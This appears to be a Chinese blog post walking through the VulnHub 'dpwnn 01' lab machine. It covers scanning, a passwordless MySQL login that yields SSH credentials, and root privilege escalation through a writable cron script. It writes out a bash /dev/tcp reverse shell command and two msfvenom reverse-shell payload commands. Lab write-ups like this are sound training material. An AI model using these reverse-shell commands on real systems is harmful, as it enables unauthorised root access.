其他分享
首页 > 其他分享> > vulnhub靶机测试--dpwnn 01

vulnhub靶机测试--dpwnn 01

作者:互联网

目录

信息收集

主机发现

在这里插入图片描述

端口扫描

在这里插入图片描述
80 http服务;22 ssh;3306 MySQL。

目录扫描

在这里插入图片描述
就一个info.php

漏洞发现及利用

访问80端口:
在这里插入图片描述
访问info.php:
在这里插入图片描述
给出了phpinfo信息。但是没有什么可以利用的点。

web端其实没什么东西。

访问3306端口,连接MySQL:
在这里插入图片描述
直接弱口令(其实没有密码,直接进来。。。。。。)

正常操作,获得账号信息:
在这里插入图片描述
获得ssh账号密码。

进行连接:
在这里插入图片描述

提权

使用sudo查看suid权限的命令:
在这里插入图片描述
使用find命令,查看suid权限:
在这里插入图片描述

这个环境用不了wget,下载不了一些提权脚本:
在这里插入图片描述
查看定时任务:

/etc/crontab

在这里插入图片描述
每3分钟以root身份执行脚本。

在脚本中写入反弹shell的命令,以root身份反弹shell:

bash -i >& /dev/tcp/192.168.133.149/7777 0>&1

在这里插入图片描述
kali进行监听:
在这里插入图片描述
提权成功。

或者使用msfvenon:
在这里插入图片描述

msfvenom -p cmd/unix/reverse_bash LHOST=192.168.133.149 LPORT=7777
msfvenom -p cmd/unix/reverse_netcat LHOST=192.168.133.149 LPORT=7777

总结

web端没有什么利用点,mysql没有密码。。确实没想到。

主要也就是了解了定时任务。

标签:端口扫描,01,133.149,--,192.168,7777,提权,vulnhub,MySQL
来源: https://blog.csdn.net/qq_45742511/article/details/115145065